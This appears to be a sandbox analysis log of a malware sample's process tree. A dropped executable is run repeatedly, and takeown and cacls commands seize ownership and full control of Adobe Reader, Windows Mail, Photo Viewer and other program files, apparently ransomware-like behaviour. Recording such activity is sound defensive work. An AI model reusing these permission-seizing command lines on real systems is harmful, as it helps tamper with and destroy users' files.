C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "engphon.env" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "CP1254.TXT" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "jnwmon.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Journal.exe.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "Journal.exe.mui" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Memo.jtp" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"2⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "Journal.exe.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui" /E /G Admin:F /C4⤵
-
-
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "email_initiator.gif" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "email_initiator.gif" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "main.css" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "review_email.gif" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "warning.gif" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "CourierStd.otf" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "trash.gif" -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "trash.gif" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "brt55.ths" -nobanner4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"2⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CourierStd.otf" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"2⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "distribute_form.gif" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MinionPro-It.otf" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "brt32.clx" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "brt32.clx" -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "ROMAN.TXT" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "NBMapTIP.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PDIALOG.exe.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PDIALOG.exe.mui" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "JNTFiltr.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "jnwdui.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "jnwdui.dll.mui" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Seyes.jtp" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "wabmig.exe" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "wabmig.exe" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"1⤵
- Loads dropped DLL
- Modifies file permissions
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner2⤵
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "8452484841978456135296162084-1601070607-1549661302-242046121604340920411376419"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "MyriadCAD.otf" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "reviewers.gif" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"1⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"1⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "jnwdui.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "jnwdui.dll.mui" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "Memo.jtp" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "jnwmon.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\ja-JP\MSPVWCTL.DLL.mui" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Genko_2.jtp" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "directories.acrodata" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "license.html" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "form_responses.gif" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "form_responses.gif" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Identity-V" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "reviews_super.gif" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "brt.hyp" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "brt.hyp" -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "can32.clx" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "GREEK.TXT" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "GREEK.TXT" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "CENTEURO.TXT" -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui" /E /G Admin:F /C3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "SYMBOL.TXT" -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "WinMail.exe" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PDIALOG.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\PDIALOG.exe"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "qmgr1.dat" -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "qmgr1.dat" -nobanner3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"2⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"1⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "MyriadPro-Regular.otf" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "cryptocme2.sig" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "cryptocme2.sig" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "end_review.gif" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "review_shared.gif" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "review_shared.gif" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "tr.gif" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MinionPro-BoldIt.otf" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "MinionPro-BoldIt.otf" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "zx______.pfm" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "zx______.pfm" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"1⤵
-
